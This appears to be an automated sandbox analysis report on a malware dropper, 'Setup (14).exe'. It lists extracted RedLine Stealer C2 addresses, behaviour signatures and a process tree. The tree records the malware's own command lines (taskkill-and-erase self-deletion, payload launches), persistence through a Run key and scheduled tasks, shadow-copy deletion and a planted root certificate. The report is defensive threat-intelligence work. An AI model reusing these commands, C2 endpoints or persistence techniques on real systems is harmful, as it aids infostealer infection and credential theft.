Overview
overview
10Static
static
Setup (1).exe
windows10_x64
10Setup (10).exe
windows10_x64
10Setup (11).exe
windows10_x64
10Setup (12).exe
windows10_x64
10Setup (13).exe
windows10_x64
10Setup (14).exe
windows10_x64
10Setup (15).exe
windows10_x64
10Setup (16).exe
windows10_x64
10Setup (17).exe
windows10_x64
10Setup (18).exe
windows10_x64
10Setup (19).exe
windows10_x64
10Setup (2).exe
windows10_x64
10Setup (20).exe
windows10_x64
10Setup (21).exe
windows10_x64
10Setup (22).exe
windows10_x64
10Setup (23).exe
windows10_x64
10Setup (24).exe
windows10_x64
10Setup (25).exe
windows10_x64
10Setup (26).exe
windows10_x64
10Setup (27).exe
windows10_x64
10Setup (28).exe
windows10_x64
10Setup (29).exe
windows10_x64
10Setup (3).exe
windows10_x64
10Setup (30).exe
windows10_x64
10Setup (31).exe
windows10_x64
10Setup (4).exe
windows10_x64
10Setup (5).exe
windows10_x64
10Setup (6).exe
windows10_x64
10Setup (7).exe
windows10_x64
10Setup (8).exe
windows10_x64
10Setup (9).exe
windows10_x64
10Setup.exe
windows10_x64
10Resubmissions
15/10/2024, 15:36
241015-s1zlzasdkc 1001/07/2024, 18:32
240701-w6yteawhmq 1001/07/2024, 14:52
240701-r82wmaxdnd 1001/07/2024, 14:52
240701-r8syqa1dpp 1011/03/2024, 21:22
240311-z8dsssgg58 1001/09/2021, 13:18
210901-5bmxjspa5s 1001/09/2021, 13:04
210901-te4btfspqa 1001/09/2021, 05:12
210901-4wnkwm1p3j 1031/08/2021, 21:47
210831-41rp97dma2 10Analysis
-
max time kernel
179s -
max time network
1811s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
24/08/2021, 20:54
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win10v20210410
Behavioral task
behavioral2
Sample
Setup (10).exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
Setup (11).exe
Resource
win10v20210408
Behavioral task
behavioral4
Sample
Setup (12).exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
Setup (13).exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
Setup (14).exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
Setup (15).exe
Resource
win10v20210410
Behavioral task
behavioral8
Sample
Setup (16).exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
Setup (17).exe
Resource
win10v20210410
Behavioral task
behavioral10
Sample
Setup (18).exe
Resource
win10v20210408
Behavioral task
behavioral11
Sample
Setup (19).exe
Resource
win10v20210410
Behavioral task
behavioral12
Sample
Setup (2).exe
Resource
win10v20210408
Behavioral task
behavioral13
Sample
Setup (20).exe
Resource
win10v20210410
Behavioral task
behavioral14
Sample
Setup (21).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
Setup (22).exe
Resource
win10v20210408
Behavioral task
behavioral16
Sample
Setup (23).exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
Setup (24).exe
Resource
win10v20210408
Behavioral task
behavioral18
Sample
Setup (25).exe
Resource
win10v20210410
Behavioral task
behavioral19
Sample
Setup (26).exe
Resource
win10v20210408
Behavioral task
behavioral20
Sample
Setup (27).exe
Resource
win10v20210410
Behavioral task
behavioral21
Sample
Setup (28).exe
Resource
win10v20210410
Behavioral task
behavioral22
Sample
Setup (29).exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
Setup (3).exe
Resource
win10v20210410
Behavioral task
behavioral24
Sample
Setup (30).exe
Resource
win10v20210408
Behavioral task
behavioral25
Sample
Setup (31).exe
Resource
win10v20210410
Behavioral task
behavioral26
Sample
Setup (4).exe
Resource
win10v20210408
Behavioral task
behavioral27
Sample
Setup (5).exe
Resource
win10v20210410
Behavioral task
behavioral28
Sample
Setup (6).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
Setup (7).exe
Resource
win10v20210408
Behavioral task
behavioral30
Sample
Setup (8).exe
Resource
win10v20210410
Behavioral task
behavioral31
Sample
Setup (9).exe
Resource
win10v20210408
Behavioral task
behavioral32
Sample
Setup.exe
Resource
win10v20210410
General
-
Target
Setup (14).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
supertraff
135.148.139.222:1494
Extracted
redline
v2
195.2.78.163:25450
Extracted
redline
24.08
95.181.172.100:55640
Extracted
redline
dibild2
135.148.139.222:1494
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5992 3676 rundll32.exe 132 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9004 3676 rundll32.exe 132 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
resource yara_rule behavioral6/files/0x000100000001ab87-143.dat family_redline behavioral6/files/0x000100000001ab87-179.dat family_redline behavioral6/memory/2348-257-0x0000000000A20000-0x0000000000A3B000-memory.dmp family_redline behavioral6/memory/4832-292-0x000000000041A76A-mapping.dmp family_redline behavioral6/memory/4832-284-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral6/memory/4800-277-0x000000000041A616-mapping.dmp family_redline behavioral6/memory/4800-273-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
flow pid Process 151 4868 cmd.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 38 IoCs
pid Process 2332 HBOyOhd25JvX0sqL7MBdiEtp.exe 2720 DtfrI6pZuuWUoC6RfUcrXtwA.exe 2688 Cd1_GhEkf6r5VyvSPccXa4pd.exe 2348 TsYrvSvl_8Fg7XvPJfjVRBqk.exe 3736 APG9Y7QLV0Wv4wkaMpjWjH5O.exe 2712 OUCxGDOmocchEqru9lIGqpec.exe 2140 8d_QkOtj1vJIPjPRfTvlMoul.exe 3728 QSjWABEot8afUaYKHNsOeMFK.exe 1952 jaMb6qv8jKSPzTumizrvUr0t.exe 1672 A2AFe8yxnoM0pAQFO_osbdcb.exe 1948 PMYOcQY_sK9WgaNnRHrGhfrV.exe 1832 Y2SB33o6zbn4ANHc4ULNYw_s.exe 212 L8_6iMKvWrCjH_BrTSZNnsZ8.exe 3972 vMrvfTC40fz0wJQSNnEb1vlj.exe 3840 AreuMkSthZVjdQsQv4v_hsUd.exe 192 HQGFXLLjwG5SufKxgwvNcyK5.exe 3956 3qJtxoADt5Bwhn7DiMi9yasB.exe 1976 Fs0ALYADNu4GdeLmIDEafYql.exe 2360 iOrJgzXZAN9GxViKD5epKQa9.exe 3156 yuOMwcQFh1wquc52IaH03wkF.exe 3596 iKBIlyzjFEyxcJCFAThmZJNH.exe 2808 Conhost.exe 1852 gXDSBbnv0dqtpT7VRWOBQ6Wx.exe 4072 gD2Wa3d8OfEdWgVPMtbiMaeH.exe 2116 gEga2cgo4qNeMiHj3tT00poP.exe 4428 gEga2cgo4qNeMiHj3tT00poP.tmp 4868 cmd.exe 4800 QSjWABEot8afUaYKHNsOeMFK.exe 4920 DtfrI6pZuuWUoC6RfUcrXtwA.exe 4932 md8_8eus.exe 4832 Y2SB33o6zbn4ANHc4ULNYw_s.exe 4988 jooyu.exe 4984 8123329.exe 4168 6623009.exe 1612 8464045.exe 5100 1859954.exe 1820 WinHoster.exe 64 WO~L~OYJWS8EVL1.eXe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OUCxGDOmocchEqru9lIGqpec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion gXDSBbnv0dqtpT7VRWOBQ6Wx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion gXDSBbnv0dqtpT7VRWOBQ6Wx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion APG9Y7QLV0Wv4wkaMpjWjH5O.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion APG9Y7QLV0Wv4wkaMpjWjH5O.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion L8_6iMKvWrCjH_BrTSZNnsZ8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion L8_6iMKvWrCjH_BrTSZNnsZ8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OUCxGDOmocchEqru9lIGqpec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Setup (14).exe -
Loads dropped DLL 3 IoCs
pid Process 2348 TsYrvSvl_8Fg7XvPJfjVRBqk.exe 4428 gEga2cgo4qNeMiHj3tT00poP.tmp 4428 gEga2cgo4qNeMiHj3tT00poP.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral6/files/0x000100000001ab8c-153.dat themida behavioral6/files/0x000100000001ab9d-141.dat themida behavioral6/files/0x000100000001ab9a-142.dat themida behavioral6/files/0x000100000001abb4-174.dat themida behavioral6/files/0x000100000001ab9a-196.dat themida behavioral6/files/0x000100000001abb4-194.dat themida behavioral6/files/0x000100000001ab9d-192.dat themida behavioral6/files/0x000100000001ab8c-186.dat themida behavioral6/memory/212-246-0x0000000000280000-0x0000000000281000-memory.dmp themida behavioral6/memory/1852-256-0x0000000000A70000-0x0000000000A71000-memory.dmp themida behavioral6/memory/3736-259-0x0000000000380000-0x0000000000381000-memory.dmp themida behavioral6/memory/2712-248-0x0000000001360000-0x0000000001361000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 6623009.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA APG9Y7QLV0Wv4wkaMpjWjH5O.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA OUCxGDOmocchEqru9lIGqpec.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA L8_6iMKvWrCjH_BrTSZNnsZ8.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA gXDSBbnv0dqtpT7VRWOBQ6Wx.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 22 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 150 ipinfo.io 217 ipinfo.io 270 freegeoip.app 30 ipinfo.io 34 api.db-ip.com 139 ip-api.com 232 ipinfo.io 239 freegeoip.app 29 ipinfo.io 245 freegeoip.app 360 ip-api.com 408 ipinfo.io 145 ipinfo.io 213 ipinfo.io 226 ipinfo.io 237 freegeoip.app 241 ipinfo.io 406 ipinfo.io 535 geoiptool.com 595 freegeoip.app 33 api.db-ip.com 596 freegeoip.app -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2712 OUCxGDOmocchEqru9lIGqpec.exe 212 L8_6iMKvWrCjH_BrTSZNnsZ8.exe 3736 APG9Y7QLV0Wv4wkaMpjWjH5O.exe 1852 gXDSBbnv0dqtpT7VRWOBQ6Wx.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3728 set thread context of 4800 3728 QSjWABEot8afUaYKHNsOeMFK.exe 116 PID 1832 set thread context of 4832 1832 Y2SB33o6zbn4ANHc4ULNYw_s.exe 115 -
Drops file in Program Files directory 5 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe Conhost.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe Conhost.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe Conhost.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini Conhost.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe Conhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 53 IoCs
pid pid_target Process procid_target 4652 3596 WerFault.exe 102 2464 3596 WerFault.exe 102 4536 3596 WerFault.exe 102 5132 3596 WerFault.exe 102 5232 2360 WerFault.exe 108 6004 192 WerFault.exe 81 5048 192 WerFault.exe 81 5812 3972 WerFault.exe 83 6088 3596 WerFault.exe 102 5400 192 WerFault.exe 81 6048 3972 WerFault.exe 83 5880 192 WerFault.exe 81 2804 3972 WerFault.exe 83 4964 192 WerFault.exe 81 5536 3972 WerFault.exe 83 5680 192 WerFault.exe 81 5356 192 WerFault.exe 81 4924 3972 WerFault.exe 83 4864 192 WerFault.exe 81 5512 192 WerFault.exe 81 4720 3972 WerFault.exe 83 3340 5452 WerFault.exe 145 6164 192 WerFault.exe 81 6564 5452 WerFault.exe 145 6764 5452 WerFault.exe 145 6836 3972 WerFault.exe 83 7160 5452 WerFault.exe 145 1384 192 WerFault.exe 81 1420 5452 WerFault.exe 145 7732 192 WerFault.exe 81 7768 192 WerFault.exe 81 7476 5452 WerFault.exe 145 4232 5468 WerFault.exe 240 7644 5452 WerFault.exe 145 5668 5468 WerFault.exe 240 500 5468 WerFault.exe 240 6116 5468 WerFault.exe 240 3140 5452 WerFault.exe 145 5388 6360 WerFault.exe 220 5260 6568 WerFault.exe 234 5204 6360 WerFault.exe 220 3500 5452 WerFault.exe 145 7036 6360 WerFault.exe 220 8344 6360 WerFault.exe 220 8448 5152 WerFault.exe 276 8584 6360 WerFault.exe 220 8596 5152 WerFault.exe 276 8772 6360 WerFault.exe 220 8804 6568 WerFault.exe 234 9016 6568 WerFault.exe 234 9072 6360 WerFault.exe 220 9108 9028 WerFault.exe 329 7528 4932 WerFault.exe 117 -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8928 schtasks.exe 4632 schtasks.exe 10020 schtasks.exe 4364 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 10412 vssadmin.exe 9656 vssadmin.exe -
Kills process with taskkill 6 IoCs
pid Process 5456 taskkill.exe 4688 taskkill.exe 6620 taskkill.exe 4520 taskkill.exe 5404 taskkill.exe 8000 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Setup (14).exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Setup (14).exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 4868 PING.EXE 2240 PING.EXE 10544 PING.EXE -
Script User-Agent 8 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 160 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 215 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 224 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 227 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 407 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 415 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 146 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 150 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 41 IoCs
pid Process 3436 Setup (14).exe 3436 Setup (14).exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 4652 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe 2464 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 2348 TsYrvSvl_8Fg7XvPJfjVRBqk.exe Token: SeDebugPrivilege 2688 Cd1_GhEkf6r5VyvSPccXa4pd.exe Token: SeDebugPrivilege 2332 HBOyOhd25JvX0sqL7MBdiEtp.exe Token: SeRestorePrivilege 4652 WerFault.exe Token: SeBackupPrivilege 4652 WerFault.exe Token: SeDebugPrivilege 4652 WerFault.exe Token: SeDebugPrivilege 2140 8d_QkOtj1vJIPjPRfTvlMoul.exe Token: SeDebugPrivilege 5100 1859954.exe Token: SeDebugPrivilege 4984 8123329.exe Token: SeDebugPrivilege 2464 WerFault.exe Token: SeDebugPrivilege 212 L8_6iMKvWrCjH_BrTSZNnsZ8.exe Token: SeDebugPrivilege 4832 Y2SB33o6zbn4ANHc4ULNYw_s.exe Token: SeDebugPrivilege 4800 QSjWABEot8afUaYKHNsOeMFK.exe Token: SeDebugPrivilege 1852 gXDSBbnv0dqtpT7VRWOBQ6Wx.exe Token: SeDebugPrivilege 2712 OUCxGDOmocchEqru9lIGqpec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4428 gEga2cgo4qNeMiHj3tT00poP.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3436 wrote to memory of 2332 3436 Setup (14).exe 94 PID 3436 wrote to memory of 2332 3436 Setup (14).exe 94 PID 3436 wrote to memory of 2348 3436 Setup (14).exe 92 PID 3436 wrote to memory of 2348 3436 Setup (14).exe 92 PID 3436 wrote to memory of 2688 3436 Setup (14).exe 91 PID 3436 wrote to memory of 2688 3436 Setup (14).exe 91 PID 3436 wrote to memory of 2688 3436 Setup (14).exe 91 PID 3436 wrote to memory of 2140 3436 Setup (14).exe 93 PID 3436 wrote to memory of 2140 3436 Setup (14).exe 93 PID 3436 wrote to memory of 2140 3436 Setup (14).exe 93 PID 3436 wrote to memory of 3736 3436 Setup (14).exe 88 PID 3436 wrote to memory of 3736 3436 Setup (14).exe 88 PID 3436 wrote to memory of 3736 3436 Setup (14).exe 88 PID 3436 wrote to memory of 2712 3436 Setup (14).exe 89 PID 3436 wrote to memory of 2712 3436 Setup (14).exe 89 PID 3436 wrote to memory of 2712 3436 Setup (14).exe 89 PID 3436 wrote to memory of 2720 3436 Setup (14).exe 90 PID 3436 wrote to memory of 2720 3436 Setup (14).exe 90 PID 3436 wrote to memory of 2720 3436 Setup (14).exe 90 PID 3436 wrote to memory of 1952 3436 Setup (14).exe 95 PID 3436 wrote to memory of 1952 3436 Setup (14).exe 95 PID 3436 wrote to memory of 1952 3436 Setup (14).exe 95 PID 3436 wrote to memory of 3728 3436 Setup (14).exe 96 PID 3436 wrote to memory of 3728 3436 Setup (14).exe 96 PID 3436 wrote to memory of 3728 3436 Setup (14).exe 96 PID 3436 wrote to memory of 1948 3436 Setup (14).exe 87 PID 3436 wrote to memory of 1948 3436 Setup (14).exe 87 PID 3436 wrote to memory of 1948 3436 Setup (14).exe 87 PID 3436 wrote to memory of 1672 3436 Setup (14).exe 86 PID 3436 wrote to memory of 1672 3436 Setup (14).exe 86 PID 3436 wrote to memory of 1832 3436 Setup (14).exe 85 PID 3436 wrote to memory of 1832 3436 Setup (14).exe 85 PID 3436 wrote to memory of 1832 3436 Setup (14).exe 85 PID 3436 wrote to memory of 212 3436 Setup (14).exe 84 PID 3436 wrote to memory of 212 3436 Setup (14).exe 84 PID 3436 wrote to memory of 212 3436 Setup (14).exe 84 PID 3436 wrote to memory of 3972 3436 Setup (14).exe 83 PID 3436 wrote to memory of 3972 3436 Setup (14).exe 83 PID 3436 wrote to memory of 3972 3436 Setup (14).exe 83 PID 3436 wrote to memory of 3840 3436 Setup (14).exe 82 PID 3436 wrote to memory of 3840 3436 Setup (14).exe 82 PID 3436 wrote to memory of 3840 3436 Setup (14).exe 82 PID 3436 wrote to memory of 192 3436 Setup (14).exe 81 PID 3436 wrote to memory of 192 3436 Setup (14).exe 81 PID 3436 wrote to memory of 192 3436 Setup (14).exe 81 PID 3436 wrote to memory of 3956 3436 Setup (14).exe 80 PID 3436 wrote to memory of 3956 3436 Setup (14).exe 80 PID 3436 wrote to memory of 3956 3436 Setup (14).exe 80 PID 3436 wrote to memory of 1976 3436 Setup (14).exe 79 PID 3436 wrote to memory of 1976 3436 Setup (14).exe 79 PID 3436 wrote to memory of 1976 3436 Setup (14).exe 79 PID 3436 wrote to memory of 2360 3436 Setup (14).exe 108 PID 3436 wrote to memory of 2360 3436 Setup (14).exe 108 PID 3436 wrote to memory of 2360 3436 Setup (14).exe 108 PID 3436 wrote to memory of 3156 3436 Setup (14).exe 103 PID 3436 wrote to memory of 3156 3436 Setup (14).exe 103 PID 3436 wrote to memory of 3156 3436 Setup (14).exe 103 PID 3436 wrote to memory of 3596 3436 Setup (14).exe 102 PID 3436 wrote to memory of 3596 3436 Setup (14).exe 102 PID 3436 wrote to memory of 3596 3436 Setup (14).exe 102 PID 3436 wrote to memory of 2808 3436 Setup (14).exe 129 PID 3436 wrote to memory of 2808 3436 Setup (14).exe 129 PID 3436 wrote to memory of 2808 3436 Setup (14).exe 129 PID 3436 wrote to memory of 1852 3436 Setup (14).exe 109
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (14).exe"C:\Users\Admin\AppData\Local\Temp\Setup (14).exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Users\Admin\Documents\Fs0ALYADNu4GdeLmIDEafYql.exe"C:\Users\Admin\Documents\Fs0ALYADNu4GdeLmIDEafYql.exe"2⤵
- Executes dropped EXE
PID:1976 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Fs0ALYADNu4GdeLmIDEafYql.exe" /f & erase "C:\Users\Admin\Documents\Fs0ALYADNu4GdeLmIDEafYql.exe" & exit3⤵PID:4328
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Fs0ALYADNu4GdeLmIDEafYql.exe" /f4⤵
- Kills process with taskkill
PID:6620
-
-
-
-
C:\Users\Admin\Documents\3qJtxoADt5Bwhn7DiMi9yasB.exe"C:\Users\Admin\Documents\3qJtxoADt5Bwhn7DiMi9yasB.exe"2⤵
- Executes dropped EXE
PID:3956 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\8378084578.exe"3⤵PID:5900
-
C:\Users\Admin\AppData\Local\Temp\8378084578.exe"C:\Users\Admin\AppData\Local\Temp\8378084578.exe"4⤵PID:5644
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7236604058.exe"3⤵PID:7996
-
C:\Users\Admin\AppData\Local\Temp\7236604058.exe"C:\Users\Admin\AppData\Local\Temp\7236604058.exe"4⤵PID:5152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5152 -s 7445⤵
- Program crash
PID:8448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5152 -s 7605⤵
- Program crash
PID:8596
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "3qJtxoADt5Bwhn7DiMi9yasB.exe" /f & erase "C:\Users\Admin\Documents\3qJtxoADt5Bwhn7DiMi9yasB.exe" & exit3⤵PID:5788
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "3qJtxoADt5Bwhn7DiMi9yasB.exe" /f4⤵
- Kills process with taskkill
PID:4520
-
-
-
-
C:\Users\Admin\Documents\HQGFXLLjwG5SufKxgwvNcyK5.exe"C:\Users\Admin\Documents\HQGFXLLjwG5SufKxgwvNcyK5.exe"2⤵
- Executes dropped EXE
PID:192 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 7603⤵
- Program crash
PID:6004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 7883⤵
- Program crash
PID:5048
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 8443⤵
- Program crash
PID:5400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 8283⤵
- Program crash
PID:5880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 9563⤵
- Program crash
PID:4964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 10043⤵
- Program crash
PID:5680
-
-
